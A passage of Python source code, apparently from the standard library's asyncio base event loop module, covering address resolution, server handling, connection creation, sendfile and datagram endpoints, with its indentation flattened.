elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self._loop)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor(
thread_name_prefix='asyncio'
)
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
warnings.warn(
'Using the default executor that is not an instance of '
'ThreadPoolExecutor is deprecated and will be prohibited '
'in Python 3.9',
DeprecationWarning, 2)
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given Internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_address=_unset, reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_address=reuse_address, reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
assert isinstance(addr, tuple) and len(addr) == 2, (
'2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
# bpo-37228
if reuse_address is not _unset:
if reuse_address:
raise ValueError("Passing `reuse_address=True` is no "
"longer supported, as the usage of "
"SO_REUSEPORT in UDP poses a significant "
"security concern.")
else:
warnings.warn("The *reuse_address* parameter has been "
"deprecated as of 3.5.10 and is scheduled "
"for removal in 3.11.", DeprecationWarning,
stacklevel=2)
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
"""Create a TCP server.
